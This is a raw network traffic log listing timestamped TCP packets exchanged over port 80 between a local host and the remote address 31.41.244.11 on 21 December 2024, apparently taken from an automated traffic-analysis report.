                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.577812910 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.578857899 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.578895092 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.578910112 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.578923941 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.580029011 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.580069065 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.580144882 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.580190897 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.581306934 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.581351042 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.581388950 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.581437111 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.582370043 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.582416058 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.582459927 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.582501888 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.583504915 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.583549023 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.583575010 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.583616018 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.584630013 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.584671974 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.715986967 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.716075897 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.716183901 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.716229916 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.716500998 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.716525078 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.716547966 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.716567993 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.717716932 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.717757940 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.718404055 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.718446016 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.719136000 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.719177008 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.719244957 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.719284058 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.719976902 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.720019102 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.720151901 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.720190048 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.721702099 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.721745014 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.722781897 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.722822905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.723350048 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.723367929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.723392963 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.723412991 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.724706888 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.724756002 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.725438118 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.725464106 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.725477934 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.725505114 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.725523949 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.726186991 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.726234913 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.726273060 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.726319075 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.727138996 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.727183104 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.727221012 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.727262020 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.728131056 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.728174925 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.728240013 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.728281975 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.729271889 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.729321003 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.729365110 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.729406118 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.730526924 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.730551004 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.730573893 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.730590105 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.731641054 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.731686115 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.731769085 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.731822014 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.732846022 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.732871056 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.732902050 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.732918978 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.733947992 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.733994007 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.734038115 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.734081984 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.735111952 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.735156059 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.735291958 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.735340118 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.736325979 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.736378908 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.736417055 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.736463070 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.737469912 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.737513065 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.737660885 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.737700939 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.738658905 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.738701105 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.738734961 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.738785028 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.739801884 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.739850044 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.739887953 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.739928961 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.740947008 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.740994930 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.741029024 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.741070986 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.742126942 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.742167950 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.742248058 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.742290020 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.743272066 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.743324041 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.743366003 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.743401051 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.744965076 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.744988918 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.745012999 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.745026112 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.745574951 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.745619059 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.745723963 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.745768070 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.746849060 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.746896029 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.746928930 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.746972084 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.747925043 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.747967958 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.748045921 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.748087883 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.749159098 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.749198914 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.749219894 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.749264956 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.750277996 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.750322104 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.750402927 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.750447035 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.751394987 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.751439095 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.751472950 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.751507998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.752651930 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.752693892 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.752723932 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.752768993 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.753735065 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.753782034 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.753890991 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.753933907 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.754906893 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.754951000 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.755033970 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.755074978 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.756095886 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.756150007 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.756169081 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.756247997 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.757342100 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.757360935 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.757381916 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.757421017 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.758505106 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.758524895 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.758550882 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.758563995 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.759608030 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.759660959 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.759780884 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.759824038 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.760839939 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.760879040 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.760943890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.760991096 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.761889935 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.761933088 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.762058973 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.762105942 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.763086081 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.763129950 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.763196945 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.763241053 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.764276981 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.764316082 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.764379978 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.764419079 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.765393972 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.765448093 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.765659094 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.765701056 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.766568899 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.766622066 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.766746044 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.766786098 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.767779112 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.767819881 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.767841101 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.767880917 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.768980026 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.768999100 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.769026995 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.769037008 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.770147085 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.770190954 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.770204067 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.770248890 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.771547079 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.771569014 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.771598101 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.771616936 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.772438049 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.772483110 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.772540092 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.772579908 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.773658991 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.773675919 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.773703098 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.773718119 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.774725914 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.774775982 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.774951935 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.774996042 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.775856972 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.775902033 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.775959015 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.776000023 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.777070999 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.777132988 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.908256054 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.908276081 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.908318996 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.908365965 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.908919096 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.908966064 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.909307957 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.909349918 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.909977913 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.910024881 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.910078049 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.910120010 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.911169052 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.911216021 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.911266088 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.911307096 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.912301064 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.912348986 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.912398100 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.912436962 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.913459063 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.913511038 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.913521051 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.913562059 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.914633036 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.914683104 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.914772987 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.914808989 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.915816069 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.915874958 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:12.915889025 CET804982831.41.244.11192.168.2.5
